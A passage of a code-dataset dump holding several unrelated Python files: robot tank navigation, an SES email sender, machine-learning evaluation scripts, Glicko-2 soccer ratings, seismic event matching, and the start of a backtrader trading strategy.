self.gyro is not None:\n self.tank.set_pid_type(\"angle\")\n angle_controller = PIDController(kp=p, ki=i, kd=d,\n input_sources=self.gyro,\n output_sources=self.tank)\n angle_controller.set_setpoint(angle)\n while not angle_controller.is_finished():\n angle_controller.calculate()\n elif self.tank.is_velocity_controlled():\n self.tank.set_pid_type(\"angle\")\n angle_controller = PIDController(kp=p, ki=i, kd=d,\n input_sources=self.tank,\n output_sources=self.tank)\n angle_controller.set_setpoint(angle)\n while not angle_controller.is_finished():\n angle_controller.calculate()\n else:\n raise Exception(\"Can't run rotate_to_angle without sensors\")\n logger.error(\"Can't run rotate_to_angle without sensors\")\n\n def followTrajectory(self, left_config, left_trajectory, right_config, right_trajectory):\n left_follower = DistanceFollower(left_trajectory)\n left_follower.configurePIDVA(kp=left_config['kp'],\n ki=left_config['ki'],\n kd=left_config['kd'],\n kv=left_config['kv'],\n ka=left_config['ka'])\n\n right_follower = DistanceFollower(right_trajectory)\n right_follower.configurePIDVA(kp=right_config['kp'],\n ki=right_config['ki'],\n kd=right_config['kd'],\n kv=right_config['kv'],\n ka=right_config['ka'])\n\n while not left_follower.is_finished() or not right_follower.is_finished():\n left_input = self.tank.get_left_posiiton()\n right_input = self.tank.get_right_position()\n\n left_output = left_follower.calculate(left_input)\n right_output = right_follower.calculate(right_input)\n\n actual_angle = self.gyro.get_heading()\n desired_angle = math.degrees(left_follower.get_heading())\n angle_difference = desired_angle - actual_angle\n # TODO: figure out reason behind constant\n turn = 0.8 * (-1.0 / 80.0) * angle_difference\n\n self.tank.drive(left_output + turn, right_output - turn)\n self.tank.stop()\n","sub_path":"head/navigation/tank.py","file_name":"tank.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"600644534","text":"from datetime import datetime\nfrom email.mime.application import MIMEApplication\nimport base64\n\nfrom django.conf import settings\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport boto3\n\nfrom .pdf_generation import generate_pdf\n\n\ndef send_email(acces_hash,to_addr, receiver_name, report_link):\n email_conn = None\n message = MIMEMultipart()\n message[\"From\"] = settings.FROM_ADDR\n message[\"To\"] = to_addr\n message[\"Subject\"] = settings.EMAIL_SUBJECT\n encoded = base64.b64encode(open(settings.METFLUX_JPEG_PATH, \"rb\").read()).decode()\n body = settings.EMAIL_BODY.format(\n receiver_name, report_link, encoded)\n\n message.attach(MIMEText(body, \"html\"))\n pdf = MIMEApplication(base64.b64decode(generate_pdf(acces_hash)),\n _subtype=\"pdf\")\n pdf.add_header('Content-Disposition', 'attachment',\n filename=\"MyFitPrint_{}.pdf\".\\\n format(datetime.today().strftime(\"%d-%m-%Y\")))\n message.attach(pdf)\n\n if not email_conn:\n email_conn = establish_email_connection()\n\n response = email_conn.send_raw_email(\n Source=message['From'],\n Destinations=[to_addr],\n RawMessage={\n 'Data': message.as_string()\n }\n )\n\n\ndef establish_email_connection():\n\n client = boto3.client(\n 'ses',\n region_name=settings.EMAIL_REGION_NAME,\n aws_access_key_id=settings.EMAIL_SECRET_KEY_ID,\n aws_secret_access_key=settings.EMAIL_SECRET_KEY\n )\n\n return client\n\n\n\n\n\n","sub_path":"myfitapp/core/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"500969809","text":"import pandas as pd\nimport numpy as np\nimport scipy.stats\nimport math\nfrom sklearn.cross_validation import StratifiedKFold, KFold\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nimport random\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import StratifiedKFold\nfrom itertools import cycle\nfrom scipy import interp\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import *\nfrom sklearn.neighbors import KNeighborsClassifier\nmc = {}\nfor d in range(1,11):\n mc['mc'+str(d)] = 0\n\nrf = RandomForestClassifier(n_estimators=100, criterion=\"entropy\",random_state=42949694,class_weight=\"balanced\")\nfor i in range(0,10):\n for j in range(0,5):\n train = pd.read_csv('wiki'+str(i)+'train'+str(j)+'.csv',delimiter='\\t')\n test = pd.read_csv('wiki'+str(i)+'test'+str(j)+'.csv',delimiter='\\t')\n tt = test.copy()\n Y_tr = train['class'].values\n del train['prev']\n del train['curr']\n del train['time']\n del train['status']\n del train['class']\n del train['prefAttachCategories']\n del train['jaccardCategories']\n del train['commonCategories']\n X_tr = train.values;\n Y_te_li = test['class'].values\n del test['class']\n del test['prev']\n del test['curr']\n del test['time']\n del test['status']\n del test['class_per']\n del test['status_class']\n del test['prefAttachCategories']\n del test['jaccardCategories']\n del test['commonCategories']\n X_te = test.values;\n probas_ = rf.fit(X_tr,Y_tr).predict_proba(X_te)\n predicted_digits = rf.predict(X_te)\n Y_p = predicted_digits\n Y_pp = probas_\n tt['pred'] = Y_pp[:,1]\n tt = tt.sort(['pred'], ascending=False)\n for d in range(1,11):\n newn = int(round(len(tt)*d*0.1))\n cf = tt.head(newn)\n mc['mc'+str(d)] = mc['mc'+str(d)] + (len(cf[cf['class']==1])/newn)\n \n\n \n\nf = open('graphprecisionRandom.txt','w')\nfor d in mc:\n f.write(str(d)+': '+str(mc[d]/50)+'\\n')\n\n\nf.close()\n \n\n\n\n\n\n\n","sub_path":"wikinewTrad.py","file_name":"wikinewTrad.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"247998088","text":"'''***************************\n|Поиск совпадений по временам|\n***************************'''\n\nfrom obspy.core import UTCDateTime\n\ndef main():\n\n stationsName={\"BKI\":0,\"KBG\":0,\"KBT\":0,\"KDT\":0,\"MKZ\":0} # Названия станций\n dictOfActs={} # Словарь в который будем записывать события и считать совпадения\n\n '''*****************************************************\n |Читаем поочередной файлы и записываем время в словарь,|\n |если оно присутствует, то к значению ключа прибавляем |\n |единичку. |\n *****************************************************'''\n\n for name in stationsName:\n f=open(f\"tectsActions({name}).txt\", \"r\")\n for line in f:\n if (dictOfActs.get(line[0:27])==None):\n dictOfActs[line[0:27]]=1\n else:\n dictOfActs[line[0:27]]+=1\n\n '''******************************************\n Учитывая кол-во совпадений выписываем все в |\n отдельный файлик. |\n ******************************************'''\n f=open(\"tectActsCoins.txt\",'w+')\n for line in dictOfActs:\n if (dictOfActs[line]>3): # Кол-во совпадений\n f.write(f\"{line} | {dictOfActs[line]}\\n\")\n f.close()\n\nmain()","sub_path":"coincidencer.py","file_name":"coincidencer.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"548832274","text":"from itertools import product\nfrom typing import List, Tuple, Dict\n\nimport pandas as pd\nfrom sklearn.metrics import log_loss\nfrom tqdm import tqdm\n\nfrom glicko2 import Glicko2, Rating\n\n\nclass GlickoSoccer(object):\n\n def __init__(self, is_draw_mode=True, is_prev_season_init=False, between_train_test_round=19):\n self.is_draw_mode = is_draw_mode\n self.is_prev_season_init = is_prev_season_init\n self.between_train_test_round = between_train_test_round\n\n def rate_teams(self, matches: pd.DataFrame, ratings: Rating(), draw_inclination: float, home_advantage: float) -> Rating():\n \"\"\"\n Calculate the ratings of teams using the history of matches\n \"\"\"\n\n glicko = Glicko2(is_draw_mode=self.is_draw_mode, draw_inclination=draw_inclination)\n\n for row in matches.itertuples():\n outcome, home_team, away_team = row.outcome, row.home_team, row.away_team\n\n ratings[home_team], ratings[away_team] = glicko.rate(ratings[home_team], ratings[away_team], home_advantage, outcome)\n\n return ratings\n\n def ratings_initialization(self, results: pd.DataFrame, schedule: pd.DataFrame, current_season: int, tournament: str,\n init_rd: float, draw_inclination: float, home_advantage: float, new_teams_rating: float) -> Rating():\n \"\"\"\n Two ways of rating initialization:\n 1) all teams get the same rating\n 2) teams get ratings from previous season with new rating deviation,\n teams from second league get specific ratings\n \"\"\"\n teams = schedule.loc[(schedule['tournament'] == tournament), 'home_team'].unique()\n\n if self.is_prev_season_init:\n previous_matches = results.loc[(results['tournament'] == tournament) & (results['season'] == (current_season - 1))]\n previous_teams = previous_matches['home_team'].unique()\n\n init_ratings = {team: Rating(rd=init_rd) for team in previous_teams}\n\n # get ratings from previous season\n previous_ratings = self.rate_teams(previous_matches, init_ratings, draw_inclination, home_advantage)\n\n # update a rating deviation\n ratings = {team: Rating(mu=previous_ratings[team].mu, rd=init_rd) for team in previous_ratings}\n\n # teams from second league\n new_teams = [team for team in teams if team not in previous_teams]\n\n # initialize the ratings of new teams\n ratings.update({team: Rating(mu=new_teams_rating, rd=init_rd) for team in new_teams})\n\n else:\n ratings = {team: Rating(rd=init_rd) for team in teams}\n\n return ratings\n\n @staticmethod\n def _log_loss(outcome: str, win_probability: float, tie_probability: float, loss_probability: float) -> float:\n \"\"\"\n Calculate log loss value of one match.\n \"\"\"\n predict = [win_probability, tie_probability, loss_probability]\n\n if outcome == 'H':\n target = [1, 0, 0]\n\n elif outcome == 'D':\n target = [0, 1, 0]\n\n else:\n target = [0, 0, 1]\n\n return log_loss(target, predict)\n\n def calculate_loss(self, results: pd.DataFrame, tournament: str, season: int, init_rd: float, draw_inclination: float,\n home_advantage: float, new_teams_rating: float) -> float:\n \"\"\"\n Calculate the value of the loss function\n \"\"\"\n\n # initialize Glicko2 with specific draw inclination\n glicko = Glicko2(is_draw_mode=self.is_draw_mode, draw_inclination=draw_inclination)\n\n # separate matches into two parts: calculate ratings from first part,\n # for second part predict matches, calculate loss value\n matches = results.loc[(results['tournament'] == tournament) & (results['season'] == season)]\n train_matches = matches.loc[matches['round'] < self.between_train_test_round]\n test_matches = matches.loc[matches['round'] > self.between_train_test_round]\n\n ratings = self.ratings_initialization(results, matches, season, tournament, init_rd, draw_inclination,\n home_advantage, new_teams_rating)\n\n ratings = self.rate_teams(train_matches, ratings, draw_inclination, home_advantage)\n\n log_loss_value = 0\n number_matches = test_matches.shape[0]\n for row in test_matches.itertuples():\n outcome, home_team, away_team = row.outcome, row.home_team, row.away_team\n\n # get current team ratings\n home_rating, away_rating = ratings[home_team], ratings[away_team]\n\n # update team ratings\n ratings[home_team], ratings[away_team] = glicko.rate(home_rating, away_rating, home_advantage, outcome)\n\n # calculate outcome probabilities\n win_probability, tie_probability, loss_probability = glicko.probabilities(home_rating, away_rating, home_advantage)\n\n log_loss_value += self._log_loss(outcome, win_probability, tie_probability, loss_probability)\n\n log_loss_value /= number_matches\n\n return log_loss_value\n\n def fit_parameters(self, results: pd.DataFrame, tournament: str, seasons: List[int],\n init_rds: List[float], draw_inclinations: List[float],\n home_advantages: List[float], new_teams_ratings: List[float]) -> Tuple[Tuple[float], float, Dict]:\n\n matches = results.loc[(results['tournament'] == tournament) & results['season'].isin(seasons)]\n\n # get all combinations of parameters\n parameters_list = list(product(init_rds, draw_inclinations, home_advantages, new_teams_ratings))\n\n parameters_loss = {parameters: 0 for parameters in parameters_list}\n for parameters in tqdm(parameters_list):\n\n init_rd, draw_inclination, home_advantage, new_teams_rating = parameters\n\n parameters_loss[parameters] = 0\n for season in seasons:\n loss = self.calculate_loss(matches, tournament, season, init_rd, draw_inclination, home_advantage, new_teams_rating)\n\n parameters_loss[parameters] += loss\n\n parameters_loss[parameters] /= len(seasons)\n\n optimal_parameters = min(parameters_loss, key=parameters_loss.get)\n optimal_loss = parameters_loss[optimal_parameters]\n\n return optimal_parameters, optimal_loss, parameters_loss\n","sub_path":"glicko_soccer/glicko_soccer.py","file_name":"glicko_soccer.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"636528518","text":"\nimport sys\n\nimport pandas as pd\nimport torch\n\nfrom pnu_semiconductor.my_utils import wf2graph\nsys.path.append(r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape'.replace('\\\\', '/'))\nsys.path.append(r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor'.replace('\\\\', '/'))\nsys.path.append(r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape\\pnu_semiconductor'.replace('\\\\', '/'))\nfrom my_preprocess import *\nfrom utils.utils import get_activation, get_known_mask, mask_edge\n\n\n#모듈 불러오기\nmodel = torch.load(\n r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape\\pnu_semiconductor\\semi\\test\\semi\\9\\model.pt'.replace(\n '\\\\', '/'))\nimpute_model = torch.load(\n r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape\\pnu_semiconductor\\semi\\test\\semi\\9\\impute_model.pt'.replace(\n '\\\\', '/'))\n\n# 패키지 구조까지 같이 저장하고 있다.. 폴더구조가 중요함..\nprint(model)\nprint(impute_model)\n\n\n# 미니 데이터 생성\ndata = {'LOT_ID': [1] * 16,\n 'WF_ID': [1] * 16,\n 'TIME': [2] * 16,\n 'X': [0] * 4 + [1] * 4 + [2] * 4 + [3] * 4,\n 'Y': [0, 1, 2, 3] * 4,\n 'para1': [1, 2, 3, 4,\n 5, pd.NA, 2, 3,\n 4, 5, pd.NA, 7,\n 8, 9, 10, 11],\n 'para2': [1, 2, 3, 4,\n 5, 2, pd.NA, 3,\n 4, 5, 7, pd.NA,\n 8, 9, 10, 11],\n 'index': range(16)\n }\ndft = pd.DataFrame(data)\ndft = dft.set_index(['LOT_ID', 'WF_ID'])\nwf = dft\nprint(wf)\n\nx, edge_index, edge_attr, edge_sim_idx = wf2graph(wf, (3, 3))\n\nprint('x')\nprint(x.shape)\nprint(x)\nprint('edge_index')\n\nprint(edge_index.t().shape)\nprint('edge_attr')\nprint(edge_attr.shape)\n\nprint('torch.cat([edge_index.t(), edge_attr])')\nt = torch.cat([edge_index.t(), edge_attr], dim=-1)\nprint(t)\nprint(edge_sim_idx.shape)\nprint(edge_sim_idx.t())\ngraph_li = [(x, edge_index, edge_attr, edge_sim_idx)]\nedge_masking_prob = 0.8\nres = []\nmodel.eval()\nimpute_model.eval()\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n print(\"GPU available.\")\nelse:\n device = torch.device(\"cpu\")\n print(\"GPU not available. Using CPU.\")\n\n# cols = []\nnrmse = []\ngraph_idx = 0\ngraph_li = [graph_li[graph_idx]]\nassert len(graph_li) == 1\n\nwith torch.no_grad():\n for i in graph_li: # forward\n x, edge_index, edge_attr, edge_index_similarity = i\n x = x.clone().detach().to(device)\n edge_index = edge_index.clone().detach().to(device)\n edge_attr = edge_attr.clone().detach().to(device).to(torch.float64)\n edge_index_similarity = edge_index_similarity.clone().detach().to(device)\n\n # known은 학습할때만 한다. forward에서는 안한다.\n # 여기서 known은 성능측정을 위해 가리는 엣지임.\n train_edge_mask = get_known_mask(edge_masking_prob, int(\n edge_attr.shape[0] / 2)) # train_edge_prob=0.7 # 양방향 엣지니까 하나만 속하도록. tensor(8240,)\n print()\n double_train_edge_mask = torch.cat((train_edge_mask, train_edge_mask),\n dim=0) # 양방향 엣지에 적용가능하도록 cat함. tensor(16480,)\n known_edge_index, known_edge_attr = mask_edge(edge_index, edge_attr,\n double_train_edge_mask,\n True)\n test_edge_index, test_edge_attr = mask_edge(edge_index, edge_attr,\n ~double_train_edge_mask,\n True)\n\n known_edge_index_single = known_edge_index[:, :known_edge_attr.shape[0] // 2].detach()\n known_edge_attr_single = known_edge_attr[:known_edge_attr.shape[0] // 2, 0].detach()\n\n edge_index_single = edge_index[:, :edge_index.shape[1] // 2]\n edge_attr_single = edge_attr[:edge_index.shape[1] // 2, 0]\n\n test_edge_index_single = test_edge_index[:, :test_edge_attr.shape[0] // 2].detach()\n test_edge_attr_single = known_edge_attr[:test_edge_attr.shape[0] // 2, 0].detach()\n # x_embd = model(x=x, edge_index=known_edge_index, edge_attr=known_edge_attr,\n # edge_sim_index=edge_index_similarity)\n # pred = impute_model([x_embd[test_edge_index[0]], x_embd[test_edge_index[1]]])\n # pred_labels = pred[:int(test_edge_attr.shape[0] / 2), 0]\n\n label = test_edge_attr[:test_edge_attr.shape[0] // 2, 0]\n\n known_edge_index_single = known_edge_index[:, :known_edge_attr.shape[0] // 2].detach()\n single_known_edge_attr = known_edge_attr[:known_edge_attr.shape[0] // 2, 0].detach()\n col_range = range(16, 18) # col의 node인덱스 범위\n edge_sum = (test_edge_attr.shape[0]//2)\n for i in col_range: # nrmse 구하기.\n idx = edge_index_single[1, :] == i # 앞의 절반이라서 0이아니라 1로 해야함.\n col = edge_index_single[:, idx]\n val = edge_attr_single[idx]\n\n test_idx = test_edge_index_single[1, :] == i\n test_col = test_edge_index_single[:, test_idx]\n test_by_col = test_edge_attr_single[test_idx]\n # pred_by_col = pred_labels[test_idx] # 모델이 없어서 imputation 불가.\n # 평균으로 imputation해서 nrmse보자.\n pred_by_col = test_by_col.mean().expand(len(pred_by_col))\n\n # cols.append((i, col, val))\n std = torch.std(val).item() # 해당 컬럼의 std를 사용해야함.\n # std = torch.std(edge_attr) # 틀림\n up = torch.sqrt(((test_by_col - pred_by_col) ** 2).sum()) #\n\n # idx = known_edge_index_single[1, :] == i # 앞의 절반이라서 0이아니라 1로 해야함.\n # col = known_edge_index_single[:, idx]\n # val = single_known_edge_attr[idx] # col i와 연결된 edge_attr만 고른다.\n # print(i, val)\n # edge_sum+=len(val)\n #\n # # cols.append((i, col, val))\n # std = torch.std(val).item()\n # # std = torch.std(edge_attr)\n # up = torch.sqrt(((label - pred_labels) ** 2).sum())\n nrmse.append((i, (up / std).item()))\n # 반복문을 돌면서 all_pred에 저장됨.\nassert edge_sum==28 #\nprint(f'엣지 개수 : {len(double_train_edge_mask)}')\nprint(f'가린 갯수 : {(~double_train_edge_mask).sum()}')\nprint(f'아는 갯수 : {(double_train_edge_mask).sum()}')\n\nprint(nrmse)\n\n","sub_path":"pnu_semiconductor/code_validation/nrmse_valid.py","file_name":"nrmse_valid.py","file_ext":"py","file_size_in_byte":6537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"53441349","text":"\"\"\"\nTrading model that can use multiple symbols, multiple timeframes, multiple indicators, and different start/end dates and analytics.\n1 primary data feed (5 min timeframe) is sourced from mysql (but can be sourced elsewhere), and then 2 additional data feeds(resampled datafeeds)\ncreated for 3 additional higher timeframes. Data feeds are as follows: data0 = 5min, data1= 15min, data2 = 60min, data3 = 1day.\nEach symbol can be accessed in each timeframe. For example, MSFT and XOM would be appear as:\ndata0 MSFT (base timeframe), data0 XOM(base timeframe), data1 MSFT(next higher timeframe), data1 XOM, data2 MSFT, data2 XOM, data3 MSFT(highest timeframe), data3 XOM - a total of 8 'datas'.\nIndicators can also be treated as a datafeed input, i.e. slope of ema indicator.\nEach data produces a \"line\" of data that includes everything from the data feed, i.e. Open, high, low, close etc. System iterates over each line via next() function to produce its results.\n\nStrategies:\n1. Mean Reversion (from double top/bottom - price breaks through prior day high/low than short/buy when price falls back just below/above prior day high/low to average like sma, vwap, etc.) - more opportunities than trending\n2. Trending (buy first oversold cycle of trend when stochastic falls under 20) - account for distance and angle of pullback (small pullback at slight angle more bullish than deeper pullback at sharp angle). Shape of pullback important - is it intermittant staircase move with sellers pushing prices down (bad, think 2 or 3 big red candle moves on pullback mixed with small green bars), or is it multiple long candle tails with small green bodies which is more bullish) Also, less volume on pullback better.\n3. VWAP trading - use as support/resistance/target for above 2 strategies\n\n\"\"\"\n\n\n\n#IMPORT MODULES\nimport backtrader as bt\nimport backtrader.indicators as btind\nfrom backtrader.feeds import mysql\nfrom datetime import date, time, datetime, timedelta\nimport pytz\nimport timeit\nimport copy\nimport math\nfrom collections import defaultdict\n\n\n#***************************************************DEVELOP STRATEGY********************************************************************\n#DEFINE ALL STRATEGY USER INPUTS\nclass UserInputs():\n\t\n\tdef __init__():\n\t\tpass\n\t\n\tdef datalist(data_req):\n\t\t#Create list of tickers to load data for. Market Breadth indicators need to be removed from initiliazation and next() so they are not traded\n\t\t\n\t\t#TICK is # of NYSE stocks trading on an uptick vs # of stocks trading on downtick. About 2800 stocks total, usually oscillates between -500 to +500. Readings above 1000 or below -1000 considered extreme\n\t\t#TRIN is ratio of (# of Advance/Decliners)/(Advance/Decline Volume). Below 1 is strong rally, Above 1 is strong decline.\n\t\t#VIX is 30 day expectation of volatility for S&P 500 options. VIX spikes correlate to market declines because more people buying options to protect themselves from declines\n\t\t\n\t\t#datalist = ['VIX','TICK-NYSE','TRIN-NYSE','SPY','XLU','IAU']\n\t\tdatalist = ['SPY','XLU']\n\t\t#datalist = ['SPY','IAU','TIP','AGG','XHB','DBA','VNQ','LQD','EWZ','XLU','MCD','XLK',]\n\t\t#datalist = ['IAU','TIP','AGG','EMB','VNQ','XLU','SPY','XOM','LQD','EWZ','MCD','DBA','EWH','EWW','HYG','XLV','XRT','XLK','SHY','XHB']\n\t\tibdatalist = ['SPY-STK-SMART-USD','AAPL-STK-SMART-USD']\n\t\t#ibdatalist = ['EUR.USD-CASH-IDEALPRO',]\n\t\t\n\t\tif data_req == 'ib':\n\t\t\treturn ibdatalist\n\t\telif data_req == 'hist':\n\t\t\treturn datalist\n\t\n\tdef model_params():\n\t\tparams = dict(\n\t\t\tlive_status = False, #Flip between live trading (True) and backtesting (False)\n\t\t\tstart_date = date(2016, 4, 1), #Dates for backtesting\n\t\t\tend_date = date(2016,7, 30),\n\t\t\tbase_timeframe = 5, #MINUTES\n\t\t\ttimeframe1 = 15, #MINUTES\n\t\t\ttimeframe2 = 60, #MINUTES\n\t\t\ttimeframe1on = True,\n\t\t\ttimeframe2on = True,\n\t\t\tprintlines = False,\n\t\t\tsessionstart = time(8,30),\n\t\t\tsessionend = time(15,00),\n\t\t\tTrailingStop = False,\n\t\t\tstart_cash=100000,\n\t\t\tdollars_risked_per_trade = 1000,\n\t\t\ttotal_dollars_risked = 50000,\n\t\t\ttarget=3, #multiple of dollars risks per trade, to determine profit target per trade. \"2\" represents target that is double dollars risked\n\t\t\tmin_touches=2,#Support/Resistance\n\t\t\ttolerance_perc=1.5,#Support/Resistance\n\t\t\tbounce_perc=5,#Support/Resistance\n\t\t\ttimer='off', #time program, 'on' or 'off', returns number of seconds\n\t\t\twriter='off', #export results to CSV output report 'on' or 'off'\n\t\t\tatr_tframe = '1', #For entry/exit stoploss logic - Apply atr timeframe 0, 1, or 2. Passed as string.\n\t\t\t)\n\t\treturn params\n\t\t\t\n\t#make sure these are NUMBERS ONLY, NOT STRINGS\n\tdef ind_params():\n\t\tparams = dict(\n\t\t\tsma1 = 10,\n\t\t\tsma2 = 20,\n\t\t\tema1= 10,\n\t\t\tema2= 20,\n\t\t\tema3=20,\n\t\t\tatrperiod= 14,\n\t\t\tatrdist= 2, \n\t\t\tavg_atr_per=20,\n\t\t\tslope_period=14,\n\t\t\tbreakout_per=5, \n\t\t\tavg_per=10,\n\t\t\tstoch_per=14,\n\t\t\tstoch_fast=3,\n\t\t\tbollinger_period=20,\n\t\t\tbollinger_dist=2,\n\t\t\tlookback=14,#Support/Resistance calcs\n\t\t\t)\n\t\treturn params\n\t\n\tdef max_ind():\t\n\t\tindicator_dict = UserInputs.ind_params()\n\t\tmaxind = max(indicator_dict.values()) \n\t\treturn maxind\n\t\t\n\tdef ib_backfill_start(maxind):\n\t\t#sometimes IB backfill does not collect enough data for live trading - this creates new start date for backfill to guarantee enough data collected for longest indicator lookback period\n\t\ttoday_date = datetime.now()\n\t\tbackfill_days = -(maxind)\n\t\tib_start_date = today_date + timedelta(days=backfill_days)\n\t\treturn ib_start_date\n\t\nclass Strategy(bt.Strategy,UserInputs):\n\t#Due to backtrader convention, any strategy arguments should be defined inside `params` dictionary or passed via bt.Cerebro() class via .addstrategy() method.\n\tparams = copy.deepcopy(UserInputs.ind_params()) #Access parameters from other class so params can be referenced outside Strategy class. 'Deep copy' copies all dictionary keys and values, vs. regular(shallow) copy which just creates reference back to old dictionary\n\t\n\tdef __init__(self):\n\t\t\n\t\t#Set program start time\n\t\tstart_time=datetime.now().time()\n\t\tprint('Program start at {}'.format(start_time))\n\t\n\t\t#print(self.params.sma1, self.p.ema1, self.params.atrperiod) #Proof deep copy worked for params\n\t\t\n\t\t#initialize counters for prenext/next\n\t\tself.dayperiod = 0\n\t\tself.nextcounter = 0\t\n\t\tself.counter = 0\n\t\tself.counttostop = 0\n\t\tself.datastatus = 0\n\t\tself.prenext_done = False\n\t\tself.bought = 0\n\t\tself.sold = 0\n\t\tself.target_long_price = 0\n\t\tself.target_short_price = 0\n\t\tself.trade_open_counter = 0\n\t\tself.trade_close_counter = 0\t\n\t\tself.trade_total_counter = 0\n\t\tself.lost_counter = 0 \n\t\tself.won_counter = 0\n\t\t\n\t\t#Define dictionaries and lists to be accessed from all timeframes\n\t\tself.atr_list =[]\n\t\tself.inds = dict()\n\t\tself.gap_dict=dict()\n\t\tself.rnghigh_dict = dict()\n\t\tself.rnglow_dict= dict()\n\t\tself.longstop_dict = dict()\n\t\tself.shortstop_dict = dict()\n\t\tself.target_long_dict = dict()\n\t\tself.target_short_dict = dict()\n\t\tself.size_dict = dict()\n\t\tself.inorder_dict = dict()\t\t\n\t\tself.sup_dict = dict()\n\t\tself.res_dict = dict()\n\t\tself.pos_dict = defaultdict(list)\n\t\tself.typprice_dict = defaultdict(list)\n\t\tself.volume_dict = defaultdict(list)\n\t\t\t\t\n\t\t#Create/Instantiate objects to access user input parameters\n\t\tmodelp = UserInputs.model_params()\n\t\tindp = UserInputs.ind_params()\n\t\tdatalist = UserInputs.datalist('hist')\n\t\tibdatalist = UserInputs.datalist('ib')\n\t\t\n\t\t#Determine interval for timeframe looping\n\t\tif not modelp.get('live_status'):\n\t\t\tdata_feed_count = len(self.datas)\n\t\t\tticker_count = len(datalist)\n\t\t\tself.ticker_interval = int(data_feed_count/ticker_count) #Needs to be an integer\n\t\telif modelp.get('live_status'): \n\t\t\tdata_feed_count = len(self.datas)\n\t\t\tticker_count = len(ibdatalist)\n\t\t\tself.ticker_interval = int(data_feed_count/ticker_count) #Needs to be an integer\n\t\t\n\t\t#Determine # of base timeframe periods within trading day\n\t\tself.intraday_periods = int(390/modelp.get('base_timeframe'))\n\t\t\n\t\t#************************INITITIALIZE INDICATORS*********************************************************\n\t\t#Initialize dictionary's\n\t\tfor x in range(0, len(self.datas), self.ticker_interval):\n\t\t\t\n\t\t\td = self.datas[x]\n\t\t\tprint(d._name)\n\t\t\t\n\t\t\t#Order dictionaries\n\t\t\tself.target_long_dict[d._name] = dict()\n\t\t\tself.target_short_dict[d._name] = dict()\n\t\t\tself.inorder_dict[d._name] = dict()\n\t\t\tself.target_long_dict[d._name] = 0\n\t\t\tself.target_short_dict[d._name] = 0\n\t\t\tself.inorder_dict[d._name] = False\n\t\n\t\tfor i, d in enumerate(self.datas):\n\n\t\t\t#Sizing dictionary\n\t\t\tself.size_dict[d._name] = dict()\n\t\t\tself.size_dict[d._name] = 0\n\t\t\t\t\n\t\t\t#For support/resistance dictionaries\n\t\t\tself.sup_dict[d._name] = dict()\n\t\t\tself.res_dict[d._name] = dict()\n\t\t\tself.sup_dict[d._name] = 0\n\t\t\tself.res_dict[d._name] = 10000\n\t\t\t\n\t\t\t#For all indicators\n\t\t\tself.inds[d._name] = dict()\n\t\t\t\n\t\t\t\t\t\n\t\t\t#Moving Average Indicators - FAST, SLOW, and CROSS\n\t\t\tself.inds[d._name]['sma1'] = btind.SMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('sma1'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['sma2'] = btind.SMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('sma2'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=True)\t\t\t\t\t\t\t\t\t\t\n\t\t\t\n\t\t\tself.inds[d._name]['ema1'] = btind.EMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('ema1'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['ema2'] = btind.EMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('ema2'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['ema3'] = btind.EMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('ema3'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\n\t\t\t#This will double pre-next \t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['cross'] = btind.CrossOver(self.inds[d._name]['ema2'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.inds[d._name]['ema3'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\n\t\t\t#RSI\n\t\t\tself.inds[d._name]['rsi']= btind.RSI(d,\n\t\t\t\t\t\t\t\t\t\t\t\tsafediv=True,\n\t\t\t\t\t\t\t\t\t\t\t\tplot=True)\n\t\t\t\t\t\t\n\t\t\t#AVERAGE TRUE RANGE INDICATOR\n\t\t\tself.inds[d._name]['atr'] = btind.ATR(d,\n\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('atrperiod'),\n\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\n\t\t\t#Bollinger Band\n\t\t\tself.inds[d._name]['bollinger'] 